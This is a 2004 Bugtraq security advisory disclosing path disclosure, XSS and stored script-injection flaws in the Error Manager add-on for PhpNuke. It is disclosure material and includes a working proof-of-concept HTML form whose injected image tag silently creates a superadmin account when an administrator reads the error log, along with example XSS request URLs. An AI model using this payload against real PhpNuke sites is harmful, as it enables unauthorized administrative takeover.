[waraxe-2004-SA#010 - Multiple vulnerabilities in Error Manager v2.1 for PhpNuke]

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [waraxe-2004-SA#010 - Multiple vulnerabilities in Error Manager v2.1 for PhpNuke]
From: Janek Vind <come2waraxe@xxxxxxxxx>
Date: 18 Mar 2004 17:02:29 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm




{================================================================================}
{                              [waraxe-2004-SA#010]                             
 }
{================================================================================}
{                                                                               
 }
{          [ Multiple vulnerabilities in Error Manager v2.1 for PhpNuke ]       
 }
{                                                                               
 }
{================================================================================}
                                                                                
                                                
Author: Janek Vind "waraxe"
Date: 18. March 2004
Location: Estonia, Tartu



Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

>From developer's readme file:

This Error Manager is made by Gijza.net
The idea came from DR3N.tk
This addon is made for PHP-NUKE 6.0. but may work for other versions
Admin CP is also included in this version.
For the latest version go to www.gijza.net


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. Full path disclosure 


Let's look at original code:

 //language
if( isset( $newlang ) ) {
   include( "language/error/lang-$newlang.php" );
   $language = $newlang;
} elseif ( isset( $lang ) ) {
   include( "language/error/lang-$lang.php" );
   $language = $lang;
} else {
   include( "language/error/lang-$language.php" );
}

So - nothing will stop us to request this php file directly and this can lead to
standard php error messages, revealing us the full path to error.php file:

http://localhost/nuke71/error.php?newlang=foobar

Warning: main(language/error/lang-foobar.php): failed to open stream: No such 
file or directory in D:\apache_wwwroot\nuke71\error.php on line 19



2. Cross-Site Scripting aka XSS


Again, let's look at original code:


if ($error == 401) {
$pagetitle = "- "._EM401."";
}
if ($error == 403) {
$pagetitle = "- "._EM403."";
}
if ($error == 404) {
$pagetitle = "- "._EM404."";
}
if ($error == 500) {
$pagetitle = "- "._EM500."";
}


This is traditionally coded by using the "switch/case" language constructions, 
but
for some reason the author uses there "if/if/if/..." construction, not even 
"if/elseif/elseif/else".
And we can see, that if variable $error is not the 401, 403, 404 or 500, but 
something else, then
we can  UNINITIALIZED $pagetitle set to any value. This will lead of course to 
XSS conditions:

http://localhost/nuke71/error.php?pagetitle=[xss code here]


One more way to XSS exploiting:


http://localhost/nuke71/error.php?error=>[xss code here]
 

As with all the PhpNuke XSS cases, using of the POST parameters or even better 
- COOKIE parameters - 
will be preffered, because the GET parameters are strictly filtered in 
mainfile.php .



3. Script injection to error log (nasty one!)


This one is my favourite bug. I mean - Error Manager is suppose to log the 
error conditions in web server
and therefore admin can find potential bugs on site and of course this logging 
feature will reveale to
admin many (unsuccessful) attacks by "bad guys". It's shame, but it's true - 
error logging in Error Manager
will log referer, request URI , etc, but WITHOUT ANY sanityze against html tags 
;)
So we can inject any javascript code to error log and when admin will browse 
the logs, the website can be
compromised - for example cookies can be stealed, additional superadmin 
accounts can be created without the
knowledge of the admin (refference to [waraxe-2004-SA#008 - easy way to get 
superadmin rights in PhpNuke 6.x-7.1.0]) etc ...

So, there is an attack scenario:

Write the html file like this one - 


<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>

<FORM action="http://www.victim.com/error.php"; method="POST">

<input type="hidden" name="error" value="<img width='0' height='0' border='0' 
src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala@xxxxxx&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">

</FORM>

</center>
<br><br><br>

</BODY>
</HTML>


Use it aginst victim server and then just wait, till admin reads the error log 
and then
login to your brand new superadmin account ;)




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum staff and to all IT security related people in 
Estonia! Tervitused!
Special greets to ulljobu!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@xxxxxxxxx
    Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------

Prev by Date: ptl-2004-02: RealNetworks Helix Server 9 Administration Server Buffer Overflow
Next by Date: TSLSA-2004-0011 - sysstat
Previous by thread: ptl-2004-02: RealNetworks Helix Server 9 Administration Server Buffer Overflow
Next by thread: TSLSA-2004-0011 - sysstat
Index(es):
- Date
- Thread